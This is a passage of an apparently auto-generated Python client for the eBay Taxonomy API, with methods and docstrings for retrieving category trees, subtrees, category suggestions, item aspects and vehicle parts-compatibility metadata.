This call returns a complete list of aspects for all of the leaf categories that belong to an eBay marketplace. The eBay marketplace is specified through the category_tree_id URI parameter. Note: This call can return a large payload, so the call returns the response as a gzipped JSON file. The open source Taxonomy SDK can be used to compare the aspect metadata that is returned in this response. The bulk download capability that this method provides, when combined with the Taxonomy SDK, brings transparency to the evolution of the metadata. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetch_item_aspects_with_http_info(category_tree_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str category_tree_id: The unique identifier of the eBay category tree being requested. (required)
:return: GetCategoriesAspectResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['category_tree_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method fetch_item_aspects" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'category_tree_id' is set
if ('category_tree_id' not in params or
params['category_tree_id'] is None):
raise ValueError("Missing the required parameter `category_tree_id` when calling `fetch_item_aspects`") # noqa: E501
collection_formats = {}
path_params = {}
if 'category_tree_id' in params:
path_params['category_tree_id'] = params['category_tree_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/category_tree/{category_tree_id}/fetch_item_aspects', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetCategoriesAspectResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_category_subtree(self, category_id, category_tree_id, **kwargs): # noqa: E501
"""Get a Category Subtree # noqa: E501
This call retrieves the details of all nodes of the category tree hierarchy (the subtree) below a specified category of a category tree. You identify the tree using the category_tree_id parameter, which was returned by the getDefaultCategoryTreeId call in the categoryTreeId field. Note: This call can return a very large payload, so you are strongly advised to submit the request with the following HTTP header: Accept-Encoding: application/gzip With this header (in addition to the required headers described under HTTP Request Headers), the call returns the response with gzip compression. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_category_subtree(category_id, category_tree_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str category_id: The unique identifier of the category at the top of the subtree being requested. Note: If the category_id submitted identifies the root node of the tree, this call returns an error. To retrieve the complete tree, use this value with the getCategoryTree call. If the category_id submitted identifies a leaf node of the tree, the call response will contain information about only that leaf node, which is a valid subtree. (required)
:param str category_tree_id: The unique identifier of the eBay category tree from which a category subtree is being requested. (required)
:return: CategorySubtree
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_category_subtree_with_http_info(category_id, category_tree_id, **kwargs) # noqa: E501
else:
(data) = self.get_category_subtree_with_http_info(category_id, category_tree_id, **kwargs) # noqa: E501
return data
def get_category_subtree_with_http_info(self, category_id, category_tree_id, **kwargs): # noqa: E501
"""Get a Category Subtree # noqa: E501
This call retrieves the details of all nodes of the category tree hierarchy (the subtree) below a specified category of a category tree. You identify the tree using the category_tree_id parameter, which was returned by the getDefaultCategoryTreeId call in the categoryTreeId field. Note: This call can return a very large payload, so you are strongly advised to submit the request with the following HTTP header: Accept-Encoding: application/gzip With this header (in addition to the required headers described under HTTP Request Headers), the call returns the response with gzip compression. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_category_subtree_with_http_info(category_id, category_tree_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str category_id: The unique identifier of the category at the top of the subtree being requested. Note: If the category_id submitted identifies the root node of the tree, this call returns an error. To retrieve the complete tree, use this value with the getCategoryTree call. If the category_id submitted identifies a leaf node of the tree, the call response will contain information about only that leaf node, which is a valid subtree. (required)
:param str category_tree_id: The unique identifier of the eBay category tree from which a category subtree is being requested. (required)
:return: CategorySubtree
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['category_id', 'category_tree_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_category_subtree" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'category_id' is set
if ('category_id' not in params or
params['category_id'] is None):
raise ValueError("Missing the required parameter `category_id` when calling `get_category_subtree`") # noqa: E501
# verify the required parameter 'category_tree_id' is set
if ('category_tree_id' not in params or
params['category_tree_id'] is None):
raise ValueError("Missing the required parameter `category_tree_id` when calling `get_category_subtree`") # noqa: E501
collection_formats = {}
path_params = {}
if 'category_tree_id' in params:
path_params['category_tree_id'] = params['category_tree_id'] # noqa: E501
query_params = []
if 'category_id' in params:
query_params.append(('category_id', params['category_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/category_tree/{category_tree_id}/get_category_subtree', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CategorySubtree', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_category_suggestions(self, category_tree_id, q, **kwargs): # noqa: E501
"""Get Suggested Categories # noqa: E501
This call returns an array of category tree leaf nodes in the specified category tree that are considered by eBay to most closely correspond to the query string q. Returned with each suggested node is a localized name for that category (based on the Accept-Language header specified for the call), and details about each of the category's ancestor nodes, extending from its immediate parent up to the root of the category tree. Note: This call can return a large payload, so you are advised to submit the request with the following HTTP header: Accept-Encoding: application/gzip With this header (in addition to the required headers described under HTTP Request Headers), the call returns the response with gzip compression. You identify the tree using the category_tree_id parameter, which was returned by the getDefaultCategoryTreeId call in the categoryTreeId field. Important: This call is not supported in the Sandbox environment. It will return a response payload in which the categoryName fields contain random or boilerplate text regardless of the query submitted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_category_suggestions(category_tree_id, q, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str category_tree_id: The unique identifier of the eBay category tree for which suggested nodes are being requested. (required)
:param str q: A quoted string that describes or characterizes the item being offered for sale. The string format is free form, and can contain any combination of phrases or keywords. eBay will parse the string and return suggested categories for the item. (required)
:return: CategorySuggestionResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_category_suggestions_with_http_info(category_tree_id, q, **kwargs) # noqa: E501
else:
(data) = self.get_category_suggestions_with_http_info(category_tree_id, q, **kwargs) # noqa: E501
return data
def get_category_suggestions_with_http_info(self, category_tree_id, q, **kwargs): # noqa: E501
"""Get Suggested Categories # noqa: E501
This call returns an array of category tree leaf nodes in the specified category tree that are considered by eBay to most closely correspond to the query string q. Returned with each suggested node is a localized name for that category (based on the Accept-Language header specified for the call), and details about each of the category's ancestor nodes, extending from its immediate parent up to the root of the category tree. Note: This call can return a large payload, so you are advised to submit the request with the following HTTP header: Accept-Encoding: application/gzip With this header (in addition to the required headers described under HTTP Request Headers), the call returns the response with gzip compression. You identify the tree using the category_tree_id parameter, which was returned by the getDefaultCategoryTreeId call in the categoryTreeId field. Important: This call is not supported in the Sandbox environment. It will return a response payload in which the categoryName fields contain random or boilerplate text regardless of the query submitted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_category_suggestions_with_http_info(category_tree_id, q, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str category_tree_id: The unique identifier of the eBay category tree for which suggested nodes are being requested. (required)
:param str q: A quoted string that describes or characterizes the item being offered for sale. The string format is free form, and can contain any combination of phrases or keywords. eBay will parse the string and return suggested categories for the item. (required)
:return: CategorySuggestionResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['category_tree_id', 'q'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_category_suggestions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'category_tree_id' is set
if ('category_tree_id' not in params or
params['category_tree_id'] is None):
raise ValueError("Missing the required parameter `category_tree_id` when calling `get_category_suggestions`") # noqa: E501
# verify the required parameter 'q' is set
if ('q' not in params or
params['q'] is None):
raise ValueError("Missing the required parameter `q` when calling `get_category_suggestions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'category_tree_id' in params:
path_params['category_tree_id'] = params['category_tree_id'] # noqa: E501
query_params = []
if 'q' in params:
query_params.append(('q', params['q'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/category_tree/{category_tree_id}/get_category_suggestions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CategorySuggestionResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_category_tree(self, category_tree_id, **kwargs): # noqa: E501
"""Get a Category Tree # noqa: E501
This call retrieves the complete category tree that is identified by the category_tree_id parameter. The value of category_tree_id was returned by the getDefaultCategoryTreeId call in the categoryTreeId field. The response contains details of all nodes of the specified eBay category tree, as well as the eBay marketplaces that use this category tree. Note: This call can return a very large payload, so you are strongly advised to submit the request with the following HTTP header: Accept-Encoding: application/gzip With this header (in addition to the required headers described under HTTP Request Headers), the call returns the response with gzip compression. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_category_tree(category_tree_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str category_tree_id: The unique identifier of the eBay category tree being requested. (required)
:return: CategoryTree
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_category_tree_with_http_info(category_tree_id, **kwargs) # noqa: E501
else:
(data) = self.get_category_tree_with_http_info(category_tree_id, **kwargs) # noqa: E501
return data
def get_category_tree_with_http_info(self, category_tree_id, **kwargs): # noqa: E501
"""Get a Category Tree # noqa: E501
This call retrieves the complete category tree that is identified by the category_tree_id parameter. The value of category_tree_id was returned by the getDefaultCategoryTreeId call in the categoryTreeId field. The response contains details of all nodes of the specified eBay category tree, as well as the eBay marketplaces that use this category tree. Note: This call can return a very large payload, so you are strongly advised to submit the request with the following HTTP header: Accept-Encoding: application/gzip With this header (in addition to the required headers described under HTTP Request Headers), the call returns the response with gzip compression. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_category_tree_with_http_info(category_tree_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str category_tree_id: The unique identifier of the eBay category tree being requested. (required)
:return: CategoryTree
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['category_tree_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_category_tree" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'category_tree_id' is set
if ('category_tree_id' not in params or
params['category_tree_id'] is None):
raise ValueError("Missing the required parameter `category_tree_id` when calling `get_category_tree`") # noqa: E501
collection_formats = {}
path_params = {}
if 'category_tree_id' in params:
path_params['category_tree_id'] = params['category_tree_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/category_tree/{category_tree_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CategoryTree', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_compatibility_properties(self, category_tree_id, category_id, **kwargs): # noqa: E501
"""Get Compatibility Properties # noqa: E501
This call retrieves the compatible vehicle aspects that are used to define a motor vehicle that is compatible with a motor vehicle part or accessory. The values that are retrieved here might include motor vehicle aspects such as 'Make', 'Model', 'Year', 'Engine', and 'Trim', and each of these aspects are localized for the eBay marketplace. The category_tree_id value is passed in as a path parameter, and this value identifies the eBay category tree. The category_id value is passed in as a query parameter, as this parameter is also required. The specified category must be a category that supports parts compatibility. At this time, this operation only supports parts and accessories listings for cars, trucks, and motorcycles (not boats, power sports, or any other vehicle types). Only the following eBay marketplaces support parts compatibility: eBay US (Motors and non-Motors categories) eBay Canada (Motors and non-Motors categories) eBay UK eBay Germany eBay Australia eBay France eBay Italy eBay Spain # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_compatibility_properties(category_tree_id, category_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str category_tree_id: This is the unique identifier of category tree. The following is the list of category_tree_id values and the eBay marketplaces that they represent. One of these ID values must be passed in as a path parameter, and the category_id value, that is passed in as query parameter, must be a valid eBay category on that eBay marketplace that supports parts compatibility for cars, trucks, or motorcyles. eBay US: 0 eBay Motors US: 100 eBay Canada: 2 eBay UK: 3 eBay Germany: 77 eBay Australia: 15 eBay France: 71 eBay Italy: 101 eBay Spain: 186 (required)
:param str category_id: The unique identifier of an eBay category. This eBay category must be a valid eBay category on the specified eBay marketplace, and the category must support parts compatibility for cars, trucks, or motorcyles. The getAutomotivePartsCompatibilityPolicies method of the Selling Metadata API can be used to retrieve all eBay categories for an eBay marketplace that supports parts compatibility cars, trucks, or motorcyles. The getAutomotivePartsCompatibilityPolicies method can also be used to see if one or more specific eBay categories support parts compatibility. (required)
:return: GetCompatibilityMetadataResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_compatibility_properties_with_http_info(category_tree_id, category_id, **kwargs) # noqa: E501
else:
(data) = self.get_compatibility_properties_with_http_info(category_tree_id, category_id, **kwargs) # noqa: E501
return data
def get_compatibility_properties_with_http_info(self, category_tree_id, category_id, **kwargs): # noqa: E501
"""Get Compatibility Properties # noqa: E501
This call retrieves the compatible vehicle aspects that are used to define a motor vehicle that is compatible with a motor vehicle part or accessory. The values that are retrieved here might include motor vehicle aspects such as 'Make', 'Model', 'Year', 'Engine', and 'Trim', and each of these aspects are localized for the eBay marketplace. The category_tree_id value is passed in as a path parameter, and this value identifies the eBay category tree. The category_id value is passed in as a query parameter, as this parameter is also required. The specified category must be a category that supports parts compatibility. At this time, this operation only supports parts and accessories listings for cars, trucks, and motorcycles (not boats, power sports, or any other vehicle types). Only the following eBay marketplaces support parts compatibility: eBay US (Motors and non-Motors categories) eBay Canada (Motors and non-Motors categories) eBay UK eBay Germany eBay Australia eBay France eBay Italy eBay Spain # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_compatibility_properties_with_http_info(category_tree_id, category_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str category_tree_id: This is the unique identifier of category tree. The following is the list of category_tree_id values and the eBay marketplaces that they represent. One of these ID values must be passed in as a path parameter, and the category_id value, that is passed in as query parameter, must be a valid eBay category on that eBay marketplace that supports parts compatibility for cars, trucks, or motorcyles. eBay US: 0 eBay Motors US: 100 eBay Canada: 2 eBay UK: 3 eBay Germany: 77 eBay Australia: 15 eBay France: 71 eBay Italy: 101 eBay Spain: 186 (required)
:param str category_id: The unique identifier of an eBay category. This eBay category must be a valid eBay category on the specified eBay marketplace, and the category must support parts compatibility for cars, trucks, or motorcyles. The getAutomotivePartsCompatibilityPolicies method of the Selling Metadata API can be used to retrieve all eBay categories for an eBay marketplace that supports parts compatibility cars, trucks, or motorcyles. The getAutomotivePartsCompatibilityPolicies method can also be used to see if one or more specific eBay categories support parts compatibility. (required)
:return: GetCompatibilityMetadataResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['category_tree_id', 'category_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_compatibility_properties" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'category_tree_id' is set
if ('category_tree_id' not in params or
params['category_tree_id'] is None):
raise ValueError("Missing the required parameter `category_tree_id` when calling `get_compatibility_properties`") # noqa: E501
# verify the required parameter 'category_id' is set
if ('category_id' not in params or
params['category_id'] is None):
raise ValueError("Missing the required parameter `category_id` when calling `get_compatibility_properties`") # noqa: E501
collection_formats = {}
path_params = {}
if 'category_tree_id' in params:
path_params['category_tree_id'] = params['category_tree_id'] # noqa: E501
query_params = []
if 'category_id' in params:
query_params.append(('category_id', params['category_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/category_tree/{category_tree_id}/get_compatibility_properties', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetCompatibilityMetadataResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_compatibility_property_values(self, category_tree_id, compatibility_property, category_id, **kwargs): # noqa: E501
"""Get Compatibility Property Values # noqa: E501
This call retrieves applicable compatible vehicle property values based on the specified eBay marketplace, specified eBay category, and filters used in the request. Compatible vehicle properties are returned in the compatibilityProperties.name field of a getCompatibilityProperties response. One compatible vehicle property applicable to the specified eBay marketplace and eBay category is specified through the required compatibility_property filter. Then, the user has the option of further restricting the compatible vehicle property values that are returned in the response by specifying one or more compatible vehicle property name/value pairs through the filter query parameter. See the documentation in URI parameters section for more information on using the compatibility_property and filter query parameters together to customize the data that is retrieved. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_compatibility_property_values(category_tree_id, compatibility_property, category_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str category_tree_id: This is the unique identifier of the category tree. The following is the list of category_tree_id values and the eBay marketplaces that they represent. One of these ID values must be passed in as a path parameter, and the category_id value, that is passed in as query parameter, must be a valid eBay category on that eBay marketplace that supports parts compatibility for cars, trucks, or motorcyles. eBay US: 0 eBay Motors US: 100 eBay Canada: 2 eBay UK: 3 eBay Germany: 77 eBay Australia: 15 eBay France: 71 eBay Italy: 101 eBay Spain: 186 (required)
:param str compatibility_property: One compatible vehicle property applicable to the specified eBay marketplace and eBay category is specified in this required filter. Compatible vehicle properties are returned in the compatibilityProperties.name field of a getCompatibilityProperties response. For example, if you wanted to retrieve all vehicle trims for a 2018 Toyota Camry, you would set this filter as follows: compatibility_property=Trim; and then include the following three name/value filters through one filter parameter: filter=Year:2018,Make:Toyota,Model:Camry. So, putting this all together, your URI would look something like this: GET https://api.ebay.com/commerce/ taxonomy/v1/category_tree/100/ get_compatibility_property_values? category_id=6016&compatibility_property=Trim &filter=filter=Year:2018,Make:Toyota,Model:Camry (required)
:param str category_id: The unique identifier of an eBay category. This eBay category must be a valid eBay category on the specified eBay marketplace, and the category must support parts compatibility for cars, trucks, or motorcyles. The getAutomotivePartsCompatibilityPolicies method of the Selling Metadata API can be used to retrieve all eBay categories for an eBay marketplace that supports parts compatibility cars, trucks, or motorcyles. The getAutomotivePartsCompatibilityPolicies method can also be used to see if one or more specific eBay categories support parts compatibility. (required)
:param str filter: One or more compatible vehicle property name/value pairs are passed in through this query parameter. The compatible vehicle property name and corresponding value are delimited with a colon (:), such as filter=Year:2018, and multiple compatible vehicle property name/value pairs are delimited with a comma (,). For example, if you wanted to retrieve all vehicle trims for a 2018 Toyota Camry, you would set the compatibility_property filter as follows: compatibility_property=Trim; and then include the following three name/value filters through one filter parameter: filter=Year:2018,Make:Toyota,Model:Camry. So, putting this all together, your URI would look something like this: GET https://api.ebay.com/commerce/ taxonomy/v1/category_tree/100/ get_compatibility_property_values? category_id=6016&compatibility_property=Trim &filter=filter=Year:2018,Make:Toyota,Model:Camry For implementation help, refer to eBay API documentation at https://developer.ebay.com/api-docs/commerce/taxonomy/types/txn:ConstraintFilter
:return: GetCompatibilityPropertyValuesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_compatibility_property_values_with_http_info(category_tree_id, compatibility_property, category_id, **kwargs) # noqa: E501
else:
(data) = self.get_compatibility_property_values_with_http_info(category_tree_id, compatibility_property, category_id, **kwargs) # noqa: E501
return data
def get_compatibility_property_values_with_http_info(self, category_tree_id, compatibility_property, category_id, **kwargs): # noqa: E501
"""Get Compatibility Property Values # noqa: E501
This call retrieves applicable compatible vehicle property values based on the specified eBay marketplace, specified eBay category, and filters used in the request. Compatible vehicle properties are returned in the compatibilityProperties.name field of a getCompatibilityProperties response. One compatible vehicle property applicable to the specified eBay marketplace and eBay category is specified through the required compatibility_property filter. Then, the user has the option of further restricting the compatible vehicle property values that are returned in the response by specifying one or more compatible vehicle property name/value pairs through the filter query parameter. See the documentation in URI parameters section for more information on using the compatibility_property and filter query parameters together to customize the data that is retrieved. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_compatibility_property_values_with_http_info(category_tree_id, compatibility_property, category_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str category_tree_id: This is the unique identifier of the category tree. The following is the list of category_tree_id values and the eBay marketplaces that they represent. One of these ID values must be passed in as a path parameter, and the category_id value, that is passed in as query parameter, must be a valid eBay category on that eBay marketplace that supports parts compatibility for cars, trucks, or motorcyles. eBay US: 0 eBay Motors US: 100 eBay Canada: 2 eBay UK: 3 eBay Germany: 77 eBay Australia: 15 eBay France: 71 eBay Italy: 101 eBay Spain: 186 (required)
:param str compatibility_property: One compatible vehicle property applicable to the specified eBay marketplace and eBay category is specified in this required filter. Compatible vehicle properties are returned in the compatibilityProperties.name field of a getCompatibilityProperties response. For example, if you wanted to retrieve all vehicle trims for a 2018 Toyota Camry, you would set this filter as follows: compatibility_property=Trim; and then include the following three name/value filters through one filter parameter: filter=Year:2018,Make:Toyota,Model:Camry. So, putting this all together, your URI would look something like this: GET https://api.ebay.com/commerce/ taxonomy/v1/category_tree/100/ get_compatibility_property_values? category_id=6016&compatibility_property=Trim &filter=filter=Year:2018,Make:Toyota,Model:Camry (required)
:param str category_id: The unique identifier of an eBay category. This eBay category must be a valid eBay category on the specified eBay marketplace, and the category must support parts compatibility for cars, trucks, or motorcyles. The getAutomotivePartsCompatibilityPolicies method of the Selling Metadata API can be used to retrieve all eBay categories for an eBay marketplace that supports parts compatibility cars, trucks, or motorcyles. The getAutomotivePartsCompatibilityPolicies method can also be used to see if one or more specific eBay categories support parts compatibility. (required)
:param str filter: One or more compatible vehicle property name/value pairs are passed in through this query parameter. The compatible vehicle property name and corresponding value are delimited with a colon (:), such as filter=Year:2018, and multiple compatible vehicle property name/value pairs are delimited with a comma (,). For example, if you wanted to retrieve all vehicle trims for a 2018 Toyota Camry, you would set the compatibility_property filter as follows: compatibility_property=Trim; and then include the following three name/value filters through one filter parameter: filter=Year:2018,Make:Toyota,Model:Camry. So, putting this all together, your URI would look something like this: GET https://api.ebay.com/commerce/ taxonomy/v1/category_tree/100/ get_compatibility_property_values? category_id=6016&compatibility_property=Trim &filter=filter=Year:2018,Make:Toyota,Model:Camry For implementation help, refer to eBay API documentation at https://developer.ebay.com/api-docs/commerce/taxonomy/types/txn:ConstraintFilter
:return: GetCompatibilityPropertyValuesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['category_tree_id', 'compatibility_property', 'category_id', 'filter'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_compatibility_property_values" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'category_tree_id' is set
if ('category_tree_id' not in params or
params['category_tree_id'] is None):
raise ValueError("Missing the required parameter `category_tree_id` when calling `get_compatibility_property_values`") # noqa: E501
# verify the required parameter 'compatibility_property' is set
if ('compatibility_property' not in params or
params['compatibility_property'] is None):
raise ValueError("Missing the required parameter `compatibility_property` when calling `get_compatibility_property_values`") # noqa: E501
# verify the required parameter 'category_id' is set
if ('category_id' not in params or
params['category_id'] is None):
raise ValueError("Missing the required parameter `category_id` when calling `get_compatibility_property_values`") # noqa: E501
collection_formats = {}
path_params = {}
if 'category_tree_id' in params:
path_params['category_tree_id'] = params['category_tree_id'] # noqa: E501
query_params = []
if 'compatibility_property' in params:
query_params.append(('compatibility_property', params['compatibility_property'])) # noqa: E501
if 'category_id' in params:
query_params.append(('category_id', params['category_id'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/category_tree/{category_tree_id}/get_compatibility_property_values', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetCompatibilityPropertyValuesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_default_category_tree_id(self, marketplace_id, **kwargs): # noqa: E501
"""Get a Default Category Tree ID # noqa: E501
A given eBay marketplace might use multiple category trees, but one of those trees is considered to be the default for that marketplace. This call retrieves a reference to the default category tree associated with the specified eBay marketplace ID. The response includes only the tree's unique identifier and version, which you can use to retrieve more details about the tree, its structure, and its individual category nodes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_default_category_tree_id(marketplace_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str marketplace_id: The ID of the eBay marketplace for which the category tree ID is being requested. For a list of supported marketplace IDs, see Marketplaces with Default Category Trees. (required)
:param str accept_language: A header used to indicate the natural language the seller prefers for the response. This specifies the language that the seller wants to use when the field values provided in the request body are displayed to consumers. Note: For details, see Accept-Language in HTTP request headers. Valid Values: For EBAY_CA in French: Accept-Language: fr-CA For EBAY_BE in French: Accept-Language: fr-BE
:return: BaseCategoryTree
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_default_category_tree_id_with_http_info(marketplace_id, **kwargs) # noqa: E501
else:
(data) = self.get_default_category_tree_id_with_http_info(marketplace_id, **kwargs) # noqa: E501
return data
def get_default_category_tree_id_with_http_info(self, marketplace_id, **kwargs): # noqa: E501
"""Get a Default Category Tree ID # noqa: E501
A given eBay marketplace might use multiple category trees, but one of those trees is considered to be the default for that marketplace. This call retrieves a reference to the default category tree associated with the specified eBay marketplace ID. The response includes only the tree's unique identifier and version, which you can use to retrieve more details about the tree, its structure, and its individual category nodes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_default_category_tree_id_with_http_info(marketplace_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str marketplace_id: The ID of the eBay marketplace for which the category tree ID is being requested. For a list of supported marketplace IDs, see Marketplaces with Default Category Trees. (required)
:param str accept_language: A header used to indicate the natural language the seller prefers for the response. This specifies the language that the seller wants to use when the field values provided in the request body are displayed to consumers. Note: For details, see Accept-Language in HTTP request headers. Valid Values: For EBAY_CA in French: Accept-Language: fr-CA For EBAY_BE in French: Accept-Language: fr-BE
:return: BaseCategoryTree
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['marketplace_id', 'accept_language'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
